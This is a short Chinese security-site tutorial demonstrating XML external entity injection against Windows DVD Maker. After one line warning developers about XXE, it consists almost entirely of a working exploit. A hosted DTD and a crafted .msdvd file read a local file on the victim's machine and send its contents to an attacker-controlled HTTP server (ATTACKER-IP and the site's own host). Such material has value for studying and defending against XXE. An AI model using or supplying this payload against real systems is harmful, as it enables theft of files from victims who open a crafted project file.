1. 首页
  2. 网络安全技术

XML实体注入实例演示教程

XML实体注入实例演示教程

无论是WEB程序,还是PC程序,只要处理用户可控的XML都可能存在危害极大的XXE漏洞,开发人员在处理XML时需谨慎,在用户可控的XML数据里禁止引用外部实体

环境:WIN7 X64 & Windows DVD Maker v6.1.7

1.攻击者运行

python -m SimpleHTTPServer 8080

2.把exp.html放到当前目录下

<?xml version="1.0" encoding="UTF-8"?>

<!ENTITY % all "<!ENTITY send SYSTEM 'http://ATTACKER-IP:8080?%file;'>">

%all;

3.受害者打开evil.msdvd

<?xml version="1.0"?>
<!DOCTYPE Netfairy 
[ 
	<!ENTITY % file SYSTEM "C:\test\agesec.txt">
	<!ENTITY % html SYSTEM "http://www.agesec.com:8080/exp.html">
	%html;
	
]>
<pwn>&send;</pwn>

利用成功攻击者能读取到受害者机器

C:\test\agesec.txt

文章来源:【安全时代】 原文链接:https://www.agesec.com/article/2297.html

安全时代全部内容仅适用于网络安全技术爱好者学习研究,学习中请遵循国家相关法律法规。

安全时代全部数据来源互联网,不代表安全时代立场,如侵犯您权益可邮箱联系我们,详情:版权纠纷

发表评论

电子邮件地址不会被公开。 必填项已用*标注